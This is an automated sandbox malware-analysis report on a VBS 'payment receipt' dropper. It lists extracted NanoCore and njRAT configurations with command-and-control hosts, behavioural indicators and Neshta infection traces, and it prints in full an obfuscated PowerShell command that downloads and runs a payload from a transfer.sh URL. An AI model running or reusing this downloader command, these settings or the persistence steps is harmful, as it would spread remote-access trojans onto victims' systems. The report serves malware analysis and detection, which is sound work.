Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05-01-2022 08:22
Static task
static1
Behavioral task
behavioral1
Sample
Y81N365C4_PAYMENT_RECEIPT.vbs
Resource
win7-en-20211208
General
-
Target
Y81N365C4_PAYMENT_RECEIPT.vbs
-
Size
2KB
-
MD5
662b66ad7298cbd883c65e11bf1161a2
-
SHA1
20f8690c74a808ab3608d262607ebae16c1c6276
-
SHA256
de10822bc600d320a74d91bbd368bafc1a53b33dc80221fe0a679ae751d5f7e5
-
SHA512
ce97094e7beb9142085cd73df104ea939e07705c7120328d21b6b4eec1604f5dce321a084a14d82b80727c60db68a09f38dfcc1a0ed93843b074ff86cb204cd3
Malware Config
Extracted
https://transfer.sh/get/oyVYmO/HHHHHHHHHHHHHHHH.txt
Extracted
nanocore
1.2.2.0
jannewyearomo.duckdns.org:8090
362bbfaa-34cf-4e04-9ff9-2cdc1915fc38
-
activate_away_mode
true
-
backup_connection_host
jannewyearomo.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-10-16T16:37:09.129050636Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
8090
-
default_group
jan new year
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
362bbfaa-34cf-4e04-9ff9-2cdc1915fc38
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
jannewyearomo.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Detect Neshta Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3864-172-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta behavioral2/memory/3864-173-0x00000000004080E4-mapping.dmp family_neshta behavioral2/memory/3864-175-0x0000000000400000-0x000000000041B000-memory.dmp family_neshta -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 4148 powershell.exe -
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe\" .." aspnet_compiler.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 4148 set thread context of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 set thread context of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 set thread context of 3864 4148 powershell.exe aspnet_compiler.exe -
Drops file in Program Files directory 53 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmplayer.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\setup_wm.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WINDOW~2\WinMail.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe aspnet_compiler.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE aspnet_compiler.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE aspnet_compiler.exe -
Drops file in Windows directory 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\Windows\svchost.com aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 3260 aspnet_compiler.exe 3260 aspnet_compiler.exe 3260 aspnet_compiler.exe 3260 aspnet_compiler.exe 3260 aspnet_compiler.exe 3260 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
aspnet_compiler.exepid process 3260 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exeaspnet_compiler.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 3260 aspnet_compiler.exe Token: SeDebugPrivilege 3796 aspnet_compiler.exe Token: 33 3796 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3796 aspnet_compiler.exe Token: 33 3796 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3796 aspnet_compiler.exe Token: 33 3796 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3796 aspnet_compiler.exe Token: 33 3796 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3796 aspnet_compiler.exe Token: 33 3796 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 3796 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
WScript.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 3416 wrote to memory of 4148 3416 WScript.exe powershell.exe PID 3416 wrote to memory of 4148 3416 WScript.exe powershell.exe PID 4148 wrote to memory of 3240 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3240 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3240 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3260 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3796 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 3864 4148 powershell.exe aspnet_compiler.exe PID 3796 wrote to memory of 1576 3796 aspnet_compiler.exe netsh.exe PID 3796 wrote to memory of 1576 3796 aspnet_compiler.exe netsh.exe PID 3796 wrote to memory of 1576 3796 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y81N365C4_PAYMENT_RECEIPT.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &((gv '*MDR*').naMe[3,11,2]-joIN'') ( (('(0PG (Rd9&(Lz0PG+0PGS{0'+'PG+0PG0}Rd9+Rd0PG+0'+'PG9{1}LzRd0PG+0PG9+Rd0PG+0PG9S0PG+0PG-fRd9+Rd9X'+'EzIR0PG+0PGd0PG+0PG9'+'+R0PG+0PGd9EXEz,XEzR'+'d9'+'+Rd9XXEz)(.R0PG+0PGd0PG+0PG9+Rd9(0PG+0PGLRd9+Rd9z0PG+0PGS{10PG+0PG}{0}R0PG+0PGd9+R0PG+0PGd90PG+0PG{20PG+0PG}LzS -R0PG+0PGd90PG+0PG+Rd90PG+0PGfXERd0PG+0PG90PG+0PG+Rd0PG'+'+0PG9zORd9+Rd9bXEz,(LR0PG+0PGd0PG+0PG9+Rd90PG+0PGzS{1}0PG+0PGRd90PG+0PG+0PG+0PGR0PG+0PGd9{0Rd9+Rd9}LzS 0PG+0PG-f'+'Rd9+Rd9 0PG+0PGRd9+Rd90PG+0PGXEz0PG+0PGw-Rd9+0P'+'G+0PGRd9XEz,XE0PG+0PGz0PG+0PGRd0'+'PG+0PG9+R'+'d9N0PG+0PGeXEz)Rd9+Rd90PG+0PG,(0PG+0PGLz0PG+0PGS{0}{1R0PG+0PGd0PG+0PG9+Rd9}Rd9+Rd90PG+0PGLz0PG+0PGS-Rd9+Rd0PG+0PG9fXEz0PG+0PGjeXE0PG+0PGz0PG+0PG,XEzRd0PG+0PG9+Rd0PG+0PG9ctX0PG+0PGEz)) (LzS{2Rd90PG+0PG+R0PG+0PGd90PG'+'+0PG}{0}0PG+0PG{'+'0PG+0PG1Rd9+Rd9}LzSRd9+0PG+0PGRd0PG+0PG9-fRd9+Rd9 R'+'d90PG+0PG+Rd9(Lz0PG+0PGRd9+Rd0PG+0PG9S{1}{0}{0PG+0PG2Rd0PG+0PG90PG+0PG+R0PG+0PGd9}Rd9+Rd9LzS 0PG+0PG-f Rd9+Rd9XRd9+Rd9EzbCl0PG+0PGXEz,XEz.W0PG+0PGe0PG+0PGXR'+'d'+'9+Rd9ERd90PG+0PG+R0PG+0PGd90PG+0PGz,XEz0PG+0PGiX0PG+0PGEz)0PG+0PG,R0PG+0PGd9+Rd9XERd9+R0PG+0PGd9ze0PG+0PGntXEz,X0PG+0PGR0PG+0PGd9+R0PG+0PGd9EzNetXEz'+')).0PG+0PG(L0PG+0PGRd9+Rd9zRd90P'+'G+0PG+Rd90PG+0P'+'GS{Rd0PG+0PG90PG+0PG+Rd0PG+0PG90}{2Rd9+0PG'+'+0PGRd'+'9}0PG+0PG{3}{0PG+0PG1}{40PG+0PG}LRd90PG+0PG+Rd9zSRd9+Rd9 0PG+0PG-f XE0PG+0PGzDXERd9+Rd9z,Rd9+R0PG+0PGd9XEzdstXEz'+',XE0PG+0PGzow0PG+0PGnXERd'+'9+R0PG+0PGd9z,R0PG+0PGd9+0PG+0PGR0PG+0PGd90PG+0PGXEzloaXER0PG+0PGd90P'+'G'+'+0PG+Rd90PG+0PGz,(LRd0PG+0PG9+0P'+'G+0PGRd9z0PG+0PGRd9+Rd9S0PG+0PG{0}{1}LzRd9+Rd0PG+0PG9S -Rd9+0PG+0PGRd9fRd0PG'+'+0PG9+R'+'d9XEzrRd9'+'+R0PG+0PGd9iXEz,0PG+0PGX0'+'PG+0PGEzn0PG+0PGgXEz0PG+0PGRd9+Rd90'+'PG+0PG)).LRd9+Rd9'+'zSINRd9+Rd0PG+0PG9vOLGykERd9+Rd9'+'LzS(0PG+0'+'PGXEzhttps://transfer.sh/get/oyVYmO/HHHHHHHHHHHHHHHH.txtX0PG+0PGRd9+Rd9Ez)Rd0PG+0PG90PG+0PG).rEp'+'l0PG+0P'+'GacE(Rd9LGyRd9'+',0PG+0PGR0PG+0PGd9tYaRd0PG+0PG9).rEplacE(([cHaR]76+0PG+0PG[cHaR]122+[0PG+0PGcHaR0PG+0PG]0PG+0PG83),[STrinG]0PG+0PG[0PG+0PGc'+'HaR]34)0PG+0PG.rEplacE(([cHaR]80PG+0PG8+[cHaR]60PG+0PG9+[cHaR]120PG+0PG2),[0PG+0PGSTr'+'inG][cHa0PG+0PGR]30PG+0PG9)0c0PG'+'+0PGoIn0PG+0PGVo0PG+0PGkE-E0PG+0PGxpre'+'sSi0PG+0PGo0PG+0PGN0PG).rEplaCe(0PGRd90PG,[sTrIng][CHar]39).rEplaCe(0PG0co0PG,0PGvKO0PG).rEplaCe(([CHar'+']116+[CHar]89+[CHar]97),[sTrIng][CHar]96)vKO .( kSfEnV:COmspeC[4,24,25]-jOIN0'+'PG0PG)') -replace ([CHaR]118+[CHaR]75+[CHaR]79),[CHaR]124-crEpLace([CHaR]48+[CHaR]80+[CHaR]71),[CHaR]39 -replace 'kSf',[CHaR]36))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1576-188-0x0000000000000000-mapping.dmp
-
memory/3260-177-0x0000000006B20000-0x0000000006B3A000-memory.dmpFilesize
104KB
-
memory/3260-170-0x00000000062B0000-0x00000000062BA000-memory.dmpFilesize
40KB
-
memory/3260-164-0x00000000056C0000-0x000000000575C000-memory.dmpFilesize
624KB
-
memory/3260-163-0x0000000005620000-0x00000000056B2000-memory.dmpFilesize
584KB
-
memory/3260-160-0x0000000005B20000-0x000000000601E000-memory.dmpFilesize
5.0MB
-
memory/3260-167-0x0000000005620000-0x0000000005B1E000-memory.dmpFilesize
5.0MB
-
memory/3260-187-0x0000000006C30000-0x0000000006C44000-memory.dmpFilesize
80KB
-
memory/3260-186-0x0000000006BF0000-0x0000000006C1E000-memory.dmpFilesize
184KB
-
memory/3260-185-0x0000000006BD0000-0x0000000006BDE000-memory.dmpFilesize
56KB
-
memory/3260-184-0x0000000006BC0000-0x0000000006BD4000-memory.dmpFilesize
80KB
-
memory/3260-183-0x0000000006BB0000-0x0000000006BB8000-memory.dmpFilesize
32KB
-
memory/3260-182-0x0000000006BA0000-0x0000000006BB4000-memory.dmpFilesize
80KB
-
memory/3260-181-0x0000000006B90000-0x0000000006B9E000-memory.dmpFilesize
56KB
-
memory/3260-180-0x0000000006B80000-0x0000000006B8C000-memory.dmpFilesize
48KB
-
memory/3260-179-0x0000000006B70000-0x0000000006B82000-memory.dmpFilesize
72KB
-
memory/3260-178-0x0000000006B50000-0x0000000006B5E000-memory.dmpFilesize
56KB
-
memory/3260-176-0x0000000006B10000-0x0000000006B1C000-memory.dmpFilesize
48KB
-
memory/3260-166-0x00000000055D0000-0x00000000055DA000-memory.dmpFilesize
40KB
-
memory/3260-169-0x0000000006290000-0x00000000062AE000-memory.dmpFilesize
120KB
-
memory/3260-151-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3260-152-0x000000000041E792-mapping.dmp
-
memory/3260-168-0x00000000057E0000-0x00000000057EA000-memory.dmpFilesize
40KB
-
memory/3260-189-0x0000000006F80000-0x0000000006FE6000-memory.dmpFilesize
408KB
-
memory/3260-158-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3260-157-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3796-156-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3796-159-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3796-154-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3796-155-0x000000000040BBCE-mapping.dmp
-
memory/3796-161-0x0000000004830000-0x00000000048CC000-memory.dmpFilesize
624KB
-
memory/3796-190-0x0000000004970000-0x0000000004E6E000-memory.dmpFilesize
5.0MB
-
memory/3796-162-0x0000000004E70000-0x000000000536E000-memory.dmpFilesize
5.0MB
-
memory/3796-191-0x0000000004E50000-0x0000000004E5A000-memory.dmpFilesize
40KB
-
memory/3796-165-0x0000000004D60000-0x0000000004DF2000-memory.dmpFilesize
584KB
-
memory/3864-175-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-172-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-173-0x00000000004080E4-mapping.dmp
-
memory/4148-135-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-118-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-121-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-148-0x0000017B3C4A0000-0x0000017B3C4B2000-memory.dmpFilesize
72KB
-
memory/4148-153-0x0000017B3C4B0000-0x0000017B3C4C2000-memory.dmpFilesize
72KB
-
memory/4148-174-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-117-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-137-0x0000017B3A396000-0x0000017B3A398000-memory.dmpFilesize
8KB
-
memory/4148-115-0x0000000000000000-mapping.dmp
-
memory/4148-128-0x0000017B3C4F0000-0x0000017B3C566000-memory.dmpFilesize
472KB
-
memory/4148-171-0x0000017B3C4C0000-0x0000017B3C4D2000-memory.dmpFilesize
72KB
-
memory/4148-138-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-136-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-127-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-126-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-125-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-124-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-123-0x0000017B3A340000-0x0000017B3A362000-memory.dmpFilesize
136KB
-
memory/4148-120-0x0000017B3A390000-0x0000017B3A392000-memory.dmpFilesize
8KB
-
memory/4148-116-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-122-0x0000017B3A393000-0x0000017B3A395000-memory.dmpFilesize
8KB
-
memory/4148-119-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB
-
memory/4148-129-0x0000017B20460000-0x0000017B20462000-memory.dmpFilesize
8KB